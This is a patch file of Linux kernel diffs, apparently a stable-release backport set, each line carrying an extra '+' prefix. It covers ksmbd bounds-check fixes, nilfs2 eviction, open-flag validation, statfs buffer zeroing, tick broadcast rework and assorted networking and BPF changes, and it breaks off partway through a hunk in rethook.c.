+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 8f96b96dbac1a..7684b31035d93 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1373,7 +1373,7 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	struct authenticate_message *authblob;
+ 	struct ksmbd_user *user;
+ 	char *name;
+-	unsigned int auth_msg_len, name_off, name_len, secbuf_len;
++	unsigned int name_off, name_len, secbuf_len;
+ 
+ 	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (secbuf_len < sizeof(struct authenticate_message)) {
+@@ -1383,9 +1383,8 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	authblob = user_authblob(conn, req);
+ 	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
+ 	name_len = le16_to_cpu(authblob->UserName.Length);
+-	auth_msg_len = le16_to_cpu(req->SecurityBufferOffset) + secbuf_len;
+ 
+-	if (auth_msg_len < (u64)name_off + name_len)
++	if (secbuf_len < (u64)name_off + name_len)
+ 		return NULL;
+ 
+ 	name = smb_strndup_from_utf16((const char *)authblob + name_off,
+@@ -2479,7 +2478,7 @@ static int smb2_create_sd_buffer(struct ksmbd_work *work,
+ 		return -ENOENT;
+ 
+ 	/* Parse SD BUFFER create contexts */
+-	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER);
++	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
+ 	if (!context)
+ 		return -ENOENT;
+ 	else if (IS_ERR(context))
+@@ -2681,7 +2680,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	if (req->CreateContextsOffset) {
+ 		/* Parse non-durable handle create contexts */
+-		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER);
++		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2701,7 +2700,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		}
+ 
+ 		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST);
++						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2712,7 +2711,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		}
+ 
+ 		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_TIMEWARP_REQUEST);
++						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2724,7 +2723,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 		if (tcon->posix_extensions) {
+ 			context = smb2_find_context_vals(req,
+-							 SMB2_CREATE_TAG_POSIX);
++							 SMB2_CREATE_TAG_POSIX, 16);
+ 			if (IS_ERR(context)) {
+ 				rc = PTR_ERR(context);
+ 				goto err_out1;
+@@ -3123,7 +3122,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		struct create_alloc_size_req *az_req;
+ 
+ 		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
+-					SMB2_CREATE_ALLOCATION_SIZE);
++					SMB2_CREATE_ALLOCATION_SIZE, 4);
+ 		if (IS_ERR(az_req)) {
+ 			rc = PTR_ERR(az_req);
+ 			goto err_out;
+@@ -3150,7 +3149,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					    err);
+ 		}
+ 
+-		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID);
++		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out;
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index 232dd7b6cca14..f6e44efb58e15 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -917,6 +917,7 @@ void nilfs_evict_inode(struct inode *inode)
+ 	struct nilfs_transaction_info ti;
+ 	struct super_block *sb = inode->i_sb;
+ 	struct nilfs_inode_info *ii = NILFS_I(inode);
++	struct the_nilfs *nilfs;
+ 	int ret;
+ 
+ 	if (inode->i_nlink || !ii->i_root || unlikely(is_bad_inode(inode))) {
+@@ -929,6 +930,23 @@ void nilfs_evict_inode(struct inode *inode)
+ 
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
++	nilfs = sb->s_fs_info;
++	if (unlikely(sb_rdonly(sb) || !nilfs->ns_writer)) {
++		/*
++		 * If this inode is about to be disposed after the file system
++		 * has been degraded to read-only due to file system corruption
++		 * or after the writer has been detached, do not make any
++		 * changes that cause writes, just clear it.
++		 * Do this check after read-locking ns_segctor_sem by
++		 * nilfs_transaction_begin() in order to avoid a race with
++		 * the writer detach operation.
++		 */
++		clear_inode(inode);
++		nilfs_clear_inode(inode);
++		nilfs_transaction_abort(sb);
++		return;
++	}
++
+ 	/* TODO: some of the following operations may fail.  */
+ 	nilfs_truncate_bmap(ii, 0);
+ 	nilfs_mark_inode_dirty(inode);
+diff --git a/fs/open.c b/fs/open.c
+index 20717ec510c07..9541430ec5b30 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1158,13 +1158,21 @@ inline int build_open_flags(const struct open_how *how, struct open_flags *op)
+ 	}
+ 
+ 	/*
+-	 * In order to ensure programs get explicit errors when trying to use
+-	 * O_TMPFILE on old kernels, O_TMPFILE is implemented such that it
+-	 * looks like (O_DIRECTORY|O_RDWR & ~O_CREAT) to old kernels. But we
+-	 * have to require userspace to explicitly set it.
++	 * Block bugs where O_DIRECTORY | O_CREAT created regular files.
++	 * Note, that blocking O_DIRECTORY | O_CREAT here also protects
++	 * O_TMPFILE below which requires O_DIRECTORY being raised.
+ 	 */
++	if ((flags & (O_DIRECTORY | O_CREAT)) == (O_DIRECTORY | O_CREAT))
++		return -EINVAL;
++
++	/* Now handle the creative implementation of O_TMPFILE. */
+ 	if (flags & __O_TMPFILE) {
+-		if ((flags & O_TMPFILE_MASK) != O_TMPFILE)
++		/*
++		 * In order to ensure programs get explicit errors when trying
++		 * to use O_TMPFILE on old kernels we enforce that O_DIRECTORY
++		 * is raised alongside __O_TMPFILE.
++		 */
++		if (!(flags & O_DIRECTORY))
+ 			return -EINVAL;
+ 		if (!(acc_mode & MAY_WRITE))
+ 			return -EINVAL;
+diff --git a/fs/statfs.c b/fs/statfs.c
+index 0ba34c1355932..96d1c3edf289c 100644
+--- a/fs/statfs.c
++++ b/fs/statfs.c
+@@ -130,6 +130,7 @@ static int do_statfs_native(struct kstatfs *st, struct statfs __user *p)
+ 	if (sizeof(buf) == sizeof(*st))
+ 		memcpy(&buf, st, sizeof(*st));
+ 	else {
++		memset(&buf, 0, sizeof(buf));
+ 		if (sizeof buf.f_blocks == 4) {
+ 			if ((st->f_blocks | st->f_bfree | st->f_bavail |
+ 			     st->f_bsize | st->f_frsize) &
+@@ -158,7 +159,6 @@ static int do_statfs_native(struct kstatfs *st, struct statfs __user *p)
+ 		buf.f_namelen = st->f_namelen;
+ 		buf.f_frsize = st->f_frsize;
+ 		buf.f_flags = st->f_flags;
+-		memset(buf.f_spare, 0, sizeof(buf.f_spare));
+ 	}
+ 	if (copy_to_user(p, &buf, sizeof(buf)))
+ 		return -EFAULT;
+@@ -171,6 +171,7 @@ static int do_statfs64(struct kstatfs *st, struct statfs64 __user *p)
+ 	if (sizeof(buf) == sizeof(*st))
+ 		memcpy(&buf, st, sizeof(*st));
+ 	else {
++		memset(&buf, 0, sizeof(buf));
+ 		buf.f_type = st->f_type;
+ 		buf.f_bsize = st->f_bsize;
+ 		buf.f_blocks = st->f_blocks;
+@@ -182,7 +183,6 @@ static int do_statfs64(struct kstatfs *st, struct statfs64 __user *p)
+ 		buf.f_namelen = st->f_namelen;
+ 		buf.f_frsize = st->f_frsize;
+ 		buf.f_flags = st->f_flags;
+-		memset(buf.f_spare, 0, sizeof(buf.f_spare));
+ 	}
+ 	if (copy_to_user(p, &buf, sizeof(buf)))
+ 		return -EFAULT;
+diff --git a/include/linux/arm-smccc.h b/include/linux/arm-smccc.h
+index 220c8c60e021a..f196c19f8e55c 100644
+--- a/include/linux/arm-smccc.h
++++ b/include/linux/arm-smccc.h
+@@ -226,6 +226,24 @@ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit);
+ 
+ extern u64 smccc_has_sve_hint;
+ 
++/**
++ * arm_smccc_get_soc_id_version()
++ *
++ * Returns the SOC ID version.
++ *
++ * When ARM_SMCCC_ARCH_SOC_ID is not present, returns SMCCC_RET_NOT_SUPPORTED.
++ */
++s32 arm_smccc_get_soc_id_version(void);
++
++/**
++ * arm_smccc_get_soc_id_revision()
++ *
++ * Returns the SOC ID revision.
++ *
++ * When ARM_SMCCC_ARCH_SOC_ID is not present, returns SMCCC_RET_NOT_SUPPORTED.
++ */
++s32 arm_smccc_get_soc_id_revision(void);
++
+ /**
+  * struct arm_smccc_res - Result from SMC/HVC call
+  * @a0-a3 result values from registers 0 to 3
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index f61447913db97..2be2091c2b447 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -161,7 +161,6 @@ enum cpuhp_state {
+ 	CPUHP_AP_PERF_X86_CSTATE_STARTING,
+ 	CPUHP_AP_PERF_XTENSA_STARTING,
+ 	CPUHP_AP_MIPS_OP_LOONGSON3_STARTING,
+-	CPUHP_AP_ARM_SDEI_STARTING,
+ 	CPUHP_AP_ARM_VFP_STARTING,
+ 	CPUHP_AP_ARM64_DEBUG_MONITORS_STARTING,
+ 	CPUHP_AP_PERF_ARM_HW_BREAKPOINT_STARTING,
+diff --git a/include/linux/dim.h b/include/linux/dim.h
+index 6c5733981563e..f343bc9aa2ec9 100644
+--- a/include/linux/dim.h
++++ b/include/linux/dim.h
+@@ -236,8 +236,9 @@ void dim_park_tired(struct dim *dim);
+  *
+  * Calculate the delta between two samples (in data rates).
+  * Takes into consideration counter wrap-around.
++ * Returned boolean indicates whether curr_stats are reliable.
+  */
+-void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
++bool dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 		    struct dim_stats *curr_stats);
+ 
+ /**
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index e00c4ee81ff7f..68b1c41332984 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -631,6 +631,23 @@ static inline __be16 vlan_get_protocol(const struct sk_buff *skb)
+ 	return __vlan_get_protocol(skb, skb->protocol, NULL);
+ }
+ 
++/* This version of __vlan_get_protocol() also pulls mac header in skb->head */
++static inline __be16 vlan_get_protocol_and_depth(struct sk_buff *skb,
++						 __be16 type, int *depth)
++{
++	int maclen;
++
++	type = __vlan_get_protocol(skb, type, &maclen);
++
++	if (type) {
++		if (!pskb_may_pull(skb, maclen))
++			type = 0;
++		else if (depth)
++			*depth = maclen;
++	}
++	return type;
++}
++
+ /* A getter for the SKB protocol field which will handle VLAN tags consistently
+  * whether VLAN acceleration is enabled or not.
+  */
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index b072449b0f1ac..eac51e22a52a8 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -2428,6 +2428,7 @@ static inline
+ struct netdev_queue *netdev_get_tx_queue(const struct net_device *dev,
+ 					 unsigned int index)
+ {
++	DEBUG_NET_WARN_ON_ONCE(index >= dev->num_tx_queues);
+ 	return &dev->_tx[index];
+ }
+ 
+diff --git a/include/linux/platform_device.h b/include/linux/platform_device.h
+index b0d5a253156ec..b845fd83f429b 100644
+--- a/include/linux/platform_device.h
++++ b/include/linux/platform_device.h
+@@ -207,7 +207,18 @@ extern void platform_device_put(struct platform_device *pdev);
+ 
+ struct platform_driver {
+ 	int (*probe)(struct platform_device *);
++
++	/*
++	 * Traditionally the remove callback returned an int which however is
++	 * ignored by the driver core. This led to wrong expectations by driver
++	 * authors who thought returning an error code was a valid error
++	 * handling strategy. To convert to a callback returning void, new
++	 * drivers should implement .remove_new() until the conversion it done
++	 * that eventually makes .remove() return void.
++	 */
+ 	int (*remove)(struct platform_device *);
++	void (*remove_new)(struct platform_device *);
++
+ 	void (*shutdown)(struct platform_device *);
+ 	int (*suspend)(struct platform_device *, pm_message_t state);
+ 	int (*resume)(struct platform_device *);
+diff --git a/include/linux/sched/task_stack.h b/include/linux/sched/task_stack.h
+index 5e799a47431e8..f158b025c1750 100644
+--- a/include/linux/sched/task_stack.h
++++ b/include/linux/sched/task_stack.h
+@@ -23,7 +23,7 @@ static __always_inline void *task_stack_page(const struct task_struct *task)
+ 
+ #define setup_thread_stack(new,old)	do { } while(0)
+ 
+-static inline unsigned long *end_of_stack(const struct task_struct *task)
++static __always_inline unsigned long *end_of_stack(const struct task_struct *task)
+ {
+ #ifdef CONFIG_STACK_GROWSUP
+ 	return (unsigned long *)((unsigned long)task->stack + THREAD_SIZE) - 1;
+diff --git a/include/linux/sunrpc/svc_rdma.h b/include/linux/sunrpc/svc_rdma.h
+index 24aa159d29a7f..fbc4bd423b355 100644
+--- a/include/linux/sunrpc/svc_rdma.h
++++ b/include/linux/sunrpc/svc_rdma.h
+@@ -176,7 +176,7 @@ extern struct svc_rdma_recv_ctxt *
+ extern void svc_rdma_recv_ctxt_put(struct svcxprt_rdma *rdma,
+ 				   struct svc_rdma_recv_ctxt *ctxt);
+ extern void svc_rdma_flush_recv_queues(struct svcxprt_rdma *rdma);
+-extern void svc_rdma_release_rqst(struct svc_rqst *rqstp);
++extern void svc_rdma_release_ctxt(struct svc_xprt *xprt, void *ctxt);
+ extern int svc_rdma_recvfrom(struct svc_rqst *);
+ 
+ /* svc_rdma_rw.c */
+diff --git a/include/linux/sunrpc/svc_xprt.h b/include/linux/sunrpc/svc_xprt.h
+index d42a75b3be102..e882fe16a5008 100644
+--- a/include/linux/sunrpc/svc_xprt.h
++++ b/include/linux/sunrpc/svc_xprt.h
+@@ -23,7 +23,7 @@ struct svc_xprt_ops {
+ 	int		(*xpo_sendto)(struct svc_rqst *);
+ 	int		(*xpo_result_payload)(struct svc_rqst *, unsigned int,
+ 					      unsigned int);
+-	void		(*xpo_release_rqst)(struct svc_rqst *);
++	void		(*xpo_release_ctxt)(struct svc_xprt *xprt, void *ctxt);
+ 	void		(*xpo_detach)(struct svc_xprt *);
+ 	void		(*xpo_free)(struct svc_xprt *);
+ 	void		(*xpo_secure_port)(struct svc_rqst *rqstp);
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index 7a381fcef939d..b350d92136c8d 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -294,6 +294,21 @@ enum {
+ 	 * during the hdev->setup vendor callback.
+ 	 */
+ 	HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG,
++
++	/* When this quirk is set, max_page for local extended features
++	 * is set to 1, even if controller reports higher number. Some
++	 * controllers (e.g. RTL8723CS) report more pages, but they
++	 * don't actually support features declared there.
++	 */
++	HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++
++	/*
++	 * When this quirk is set, the HCI_OP_LE_SET_RPA_TIMEOUT command is
++	 * skipped during initialization. This is required for the Actions
++	 * Semiconductor ATS2851 based controllers, which erroneously claims
++	 * to support it.
++	 */
++	HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT,
+ };
+ 
+ /* HCI device flags */
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 768348008d0c9..123729c0e1ee1 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -235,7 +235,7 @@ struct bonding {
+ 	 */
+ 	spinlock_t mode_lock;
+ 	spinlock_t stats_lock;
+-	u8	 send_peer_notif;
++	u32	 send_peer_notif;
+ 	u8       igmp_retrans;
+ #ifdef CONFIG_PROC_FS
+ 	struct   proc_dir_entry *proc_entry;
+diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
+index 1fca6a88114ad..abc46f05762e6 100644
+--- a/include/net/ip_vs.h
++++ b/include/net/ip_vs.h
+@@ -549,8 +549,10 @@ struct ip_vs_conn {
+ 	 */
+ 	struct ip_vs_app        *app;           /* bound ip_vs_app object */
+ 	void                    *app_data;      /* Application private data */
+-	struct ip_vs_seq        in_seq;         /* incoming seq. struct */
+-	struct ip_vs_seq        out_seq;        /* outgoing seq. struct */
++	struct_group(sync_conn_opt,
++		struct ip_vs_seq  in_seq;       /* incoming seq. struct */
++		struct ip_vs_seq  out_seq;      /* outgoing seq. struct */
++	);
+ 
+ 	const struct ip_vs_pe	*pe;
+ 	char			*pe_data;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 832a4a51de4d9..beb1b747fb09d 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2744,7 +2744,7 @@ static inline void sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+ 		__sock_recv_cmsgs(msg, sk, skb);
+ 	else if (unlikely(sock_flag(sk, SOCK_TIMESTAMP)))
+ 		sock_write_timestamp(sk, skb->tstamp);
+-	else if (unlikely(sk->sk_stamp == SK_DEFAULT_STAMP))
++	else if (unlikely(sock_read_timestamp(sk) == SK_DEFAULT_STAMP))
+ 		sock_write_timestamp(sk, 0);
+ }
+ 
+diff --git a/include/uapi/asm-generic/fcntl.h b/include/uapi/asm-generic/fcntl.h
+index 1ecdb911add8d..80f37a0d40d7d 100644
+--- a/include/uapi/asm-generic/fcntl.h
++++ b/include/uapi/asm-generic/fcntl.h
+@@ -91,7 +91,6 @@
+ 
+ /* a horrid kludge trying to make sure that this will fail on old kernels */
+ #define O_TMPFILE (__O_TMPFILE | O_DIRECTORY)
+-#define O_TMPFILE_MASK (__O_TMPFILE | O_DIRECTORY | O_CREAT)      
+ 
+ #ifndef O_NDELAY
+ #define O_NDELAY	O_NONBLOCK
+diff --git a/kernel/bpf/bpf_local_storage.c b/kernel/bpf/bpf_local_storage.c
+index f27fa5ba7d722..d9d88a2cda5e5 100644
+--- a/kernel/bpf/bpf_local_storage.c
++++ b/kernel/bpf/bpf_local_storage.c
+@@ -51,11 +51,21 @@ owner_storage(struct bpf_local_storage_map *smap, void *owner)
+ 	return map->ops->map_owner_storage_ptr(owner);
+ }
+ 
++static bool selem_linked_to_storage_lockless(const struct bpf_local_storage_elem *selem)
++{
++	return !hlist_unhashed_lockless(&selem->snode);
++}
++
+ static bool selem_linked_to_storage(const struct bpf_local_storage_elem *selem)
+ {
+ 	return !hlist_unhashed(&selem->snode);
+ }
+ 
++static bool selem_linked_to_map_lockless(const struct bpf_local_storage_elem *selem)
++{
++	return !hlist_unhashed_lockless(&selem->map_node);
++}
++
+ static bool selem_linked_to_map(const struct bpf_local_storage_elem *selem)
+ {
+ 	return !hlist_unhashed(&selem->map_node);
+@@ -165,7 +175,7 @@ static void __bpf_selem_unlink_storage(struct bpf_local_storage_elem *selem,
+ 	bool free_local_storage = false;
+ 	unsigned long flags;
+ 
+-	if (unlikely(!selem_linked_to_storage(selem)))
++	if (unlikely(!selem_linked_to_storage_lockless(selem)))
+ 		/* selem has already been unlinked from sk */
+ 		return;
+ 
+@@ -199,7 +209,7 @@ void bpf_selem_unlink_map(struct bpf_local_storage_elem *selem)
+ 	struct bpf_local_storage_map_bucket *b;
+ 	unsigned long flags;
+ 
+-	if (unlikely(!selem_linked_to_map(selem)))
++	if (unlikely(!selem_linked_to_map_lockless(selem)))
+ 		/* selem has already be unlinked from smap */
+ 		return;
+ 
+@@ -410,7 +420,7 @@ bpf_local_storage_update(void *owner, struct bpf_local_storage_map *smap,
+ 		err = check_flags(old_sdata, map_flags);
+ 		if (err)
+ 			return ERR_PTR(err);
+-		if (old_sdata && selem_linked_to_storage(SELEM(old_sdata))) {
++		if (old_sdata && selem_linked_to_storage_lockless(SELEM(old_sdata))) {
+ 			copy_map_value_locked(&smap->map, old_sdata->data,
+ 					      value, false);
+ 			return old_sdata;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8726161076134..322a2ae8f88b0 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -15133,6 +15133,10 @@ BTF_ID(func, migrate_enable)
+ #if !defined CONFIG_PREEMPT_RCU && !defined CONFIG_TINY_RCU
+ BTF_ID(func, rcu_read_unlock_strict)
+ #endif
++#if defined(CONFIG_DEBUG_PREEMPT) || defined(CONFIG_TRACE_PREEMPT_TOGGLE)
++BTF_ID(func, preempt_count_add)
++BTF_ID(func, preempt_count_sub)
++#endif
+ BTF_SET_END(btf_id_deny)
+ 
+ static int check_attach_btf_id(struct bpf_verifier_env *env)
+diff --git a/kernel/rcu/refscale.c b/kernel/rcu/refscale.c
+index 435c884c02b5c..d49a9d66e0000 100644
+--- a/kernel/rcu/refscale.c
++++ b/kernel/rcu/refscale.c
+@@ -795,7 +795,7 @@ ref_scale_cleanup(void)
+ static int
+ ref_scale_shutdown(void *arg)
+ {
+-	wait_event(shutdown_wq, shutdown_start);
++	wait_event_idle(shutdown_wq, shutdown_start);
+ 
+ 	smp_mb(); // Wake before output.
+ 	ref_scale_cleanup();
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 60732264a7d0b..e25321dbb068e 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -800,9 +800,11 @@ static int rcu_print_task_exp_stall(struct rcu_node *rnp)
+ 	int ndetected = 0;
+ 	struct task_struct *t;
+ 
+-	if (!READ_ONCE(rnp->exp_tasks))
+-		return 0;
+ 	raw_spin_lock_irqsave_rcu_node(rnp, flags);
++	if (!rnp->exp_tasks) {
++		raw_spin_unlock_irqrestore_rcu_node(rnp, flags);
++		return 0;
++	}
+ 	t = list_entry(rnp->exp_tasks->prev,
+ 		       struct task_struct, rcu_node_entry);
+ 	list_for_each_entry_continue(t, &rnp->blkd_tasks, rcu_node_entry) {
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index f7fe6fe361731..0916cc9adb828 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -35,14 +35,15 @@ static __cacheline_aligned_in_smp DEFINE_RAW_SPINLOCK(tick_broadcast_lock);
+ #ifdef CONFIG_TICK_ONESHOT
+ static DEFINE_PER_CPU(struct clock_event_device *, tick_oneshot_wakeup_device);
+ 
+-static void tick_broadcast_setup_oneshot(struct clock_event_device *bc);
++static void tick_broadcast_setup_oneshot(struct clock_event_device *bc, bool from_periodic);
+ static void tick_broadcast_clear_oneshot(int cpu);
+ static void tick_resume_broadcast_oneshot(struct clock_event_device *bc);
+ # ifdef CONFIG_HOTPLUG_CPU
+ static void tick_broadcast_oneshot_offline(unsigned int cpu);
+ # endif
+ #else
+-static inline void tick_broadcast_setup_oneshot(struct clock_event_device *bc) { BUG(); }
++static inline void
++tick_broadcast_setup_oneshot(struct clock_event_device *bc, bool from_periodic) { BUG(); }
+ static inline void tick_broadcast_clear_oneshot(int cpu) { }
+ static inline void tick_resume_broadcast_oneshot(struct clock_event_device *bc) { }
+ # ifdef CONFIG_HOTPLUG_CPU
+@@ -264,7 +265,7 @@ int tick_device_uses_broadcast(struct clock_event_device *dev, int cpu)
+ 		if (tick_broadcast_device.mode == TICKDEV_MODE_PERIODIC)
+ 			tick_broadcast_start_periodic(bc);
+ 		else
+-			tick_broadcast_setup_oneshot(bc);
++			tick_broadcast_setup_oneshot(bc, false);
+ 		ret = 1;
+ 	} else {
+ 		/*
+@@ -500,7 +501,7 @@ void tick_broadcast_control(enum tick_broadcast_mode mode)
+ 			if (tick_broadcast_device.mode == TICKDEV_MODE_PERIODIC)
+ 				tick_broadcast_start_periodic(bc);
+ 			else
+-				tick_broadcast_setup_oneshot(bc);
++				tick_broadcast_setup_oneshot(bc, false);
+ 		}
+ 	}
+ out:
+@@ -1016,48 +1017,101 @@ static inline ktime_t tick_get_next_period(void)
+ /**
+  * tick_broadcast_setup_oneshot - setup the broadcast device
+  */
+-static void tick_broadcast_setup_oneshot(struct clock_event_device *bc)
++static void tick_broadcast_setup_oneshot(struct clock_event_device *bc,
++					 bool from_periodic)
+ {
+ 	int cpu = smp_processor_id();
++	ktime_t nexttick = 0;
+ 
+ 	if (!bc)
+ 		return;
+ 
+-	/* Set it up only once ! */
+-	if (bc->event_handler != tick_handle_oneshot_broadcast) {
+-		int was_periodic = clockevent_state_periodic(bc);
+-
+-		bc->event_handler = tick_handle_oneshot_broadcast;
+-
++	/*
++	 * When the broadcast device was switched to oneshot by the first
++	 * CPU handling the NOHZ change, the other CPUs will reach this
++	 * code via hrtimer_run_queues() -> tick_check_oneshot_change()
++	 * too. Set up the broadcast device only once!
++	 */
++	if (bc->event_handler == tick_handle_oneshot_broadcast) {
+ 		/*
+-		 * We must be careful here. There might be other CPUs
+-		 * waiting for periodic broadcast. We need to set the
+-		 * oneshot_mask bits for those and program the
+-		 * broadcast device to fire.
++		 * The CPU which switched from periodic to oneshot mode
++		 * set the broadcast oneshot bit for all other CPUs which
++		 * are in the general (periodic) broadcast mask to ensure
++		 * that CPUs which wait for the periodic broadcast are
++		 * woken up.
++		 *
++		 * Clear the bit for the local CPU as the set bit would
++		 * prevent the first tick_broadcast_enter() after this CPU
++		 * switched to oneshot state to program the broadcast
++		 * device.
++		 *
++		 * This code can also be reached via tick_broadcast_control(),
++		 * but this cannot avoid the tick_broadcast_clear_oneshot()
++		 * as that would break the periodic to oneshot transition of
++		 * secondary CPUs. But that's harmless as the below only
++		 * clears already cleared bits.
+ 		 */
++		tick_broadcast_clear_oneshot(cpu);
++		return;
++	}
++
++
++	bc->event_handler = tick_handle_oneshot_broadcast;
++	bc->next_event = KTIME_MAX;
++
++	/*
++	 * When the tick mode is switched from periodic to oneshot it must
++	 * be ensured that CPUs which are waiting for periodic broadcast
++	 * get their wake-up at the next tick.  This is achieved by ORing
++	 * tick_broadcast_mask into tick_broadcast_oneshot_mask.
++	 *
++	 * For other callers, e.g. broadcast device replacement,
++	 * tick_broadcast_oneshot_mask must not be touched as this would
++	 * set bits for CPUs which are already NOHZ, but not idle. Their
++	 * next tick_broadcast_enter() would observe the bit set and fail
++	 * to update the expiry time and the broadcast event device.
++	 */
++	if (from_periodic) {
+ 		cpumask_copy(tmpmask, tick_broadcast_mask);
++		/* Remove the local CPU as it is obviously not idle */
+ 		cpumask_clear_cpu(cpu, tmpmask);
+-		cpumask_or(tick_broadcast_oneshot_mask,
+-			   tick_broadcast_oneshot_mask, tmpmask);
++		cpumask_or(tick_broadcast_oneshot_mask, tick_broadcast_oneshot_mask, tmpmask);
+ 
+-		if (was_periodic && !cpumask_empty(tmpmask)) {
+-			ktime_t nextevt = tick_get_next_period();
++		/*
++		 * Ensure that the oneshot broadcast handler will wake the
++		 * CPUs which are still waiting for periodic broadcast.
++		 */
++		nexttick = tick_get_next_period();
++		tick_broadcast_init_next_event(tmpmask, nexttick);
+ 
+-			clockevents_switch_state(bc, CLOCK_EVT_STATE_ONESHOT);
+-			tick_broadcast_init_next_event(tmpmask, nextevt);
+-			tick_broadcast_set_event(bc, cpu, nextevt);
+-		} else
+-			bc->next_event = KTIME_MAX;
+-	} else {
+ 		/*
+-		 * The first cpu which switches to oneshot mode sets
+-		 * the bit for all other cpus which are in the general
+-		 * (periodic) broadcast mask. So the bit is set and
+-		 * would prevent the first broadcast enter after this
+-		 * to program the bc device.
++		 * If the underlying broadcast clock event device is
++		 * already in oneshot state, then there is nothing to do.
++		 * The device was already armed for the next tick
++		 * in tick_handle_broadcast_periodic()
+ 		 */
+-		tick_broadcast_clear_oneshot(cpu);
++		if (clockevent_state_oneshot(bc))
++			return;
+ 	}
++
++	/*
++	 * When switching from periodic to oneshot mode arm the broadcast
++	 * device for the next tick.
++	 *
++	 * If the broadcast device has been replaced in oneshot mode and
++	 * the oneshot broadcast mask is not empty, then arm it to expire
++	 * immediately in order to reevaluate the next expiring timer.
++	 * @nexttick is 0 and therefore in the past which will cause the
++	 * clockevent code to force an event.
++	 *
++	 * For both cases the programming can be avoided when the oneshot
++	 * broadcast mask is empty.
++	 *
++	 * tick_broadcast_set_event() implicitly switches the broadcast
++	 * device to oneshot state.
++	 */
++	if (!cpumask_empty(tick_broadcast_oneshot_mask))
++		tick_broadcast_set_event(bc, cpu, nexttick);
+ }
+ 
+ /*
+@@ -1066,14 +1120,16 @@ static void tick_broadcast_setup_oneshot(struct clock_event_device *bc)
+ void tick_broadcast_switch_to_oneshot(void)
+ {
+ 	struct clock_event_device *bc;
++	enum tick_device_mode oldmode;
+ 	unsigned long flags;
+ 
+ 	raw_spin_lock_irqsave(&tick_broadcast_lock, flags);
+ 
++	oldmode = tick_broadcast_device.mode;
+ 	tick_broadcast_device.mode = TICKDEV_MODE_ONESHOT;
+ 	bc = tick_broadcast_device.evtdev;
+ 	if (bc)
+-		tick_broadcast_setup_oneshot(bc);
++		tick_broadcast_setup_oneshot(bc, oldmode == TICKDEV_MODE_PERIODIC);
+ 
+ 	raw_spin_unlock_irqrestore(&tick_broadcast_lock, flags);
+ }
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 32c3dfdb4d6a7..60f6cb2b486bf 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -288,7 +288,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
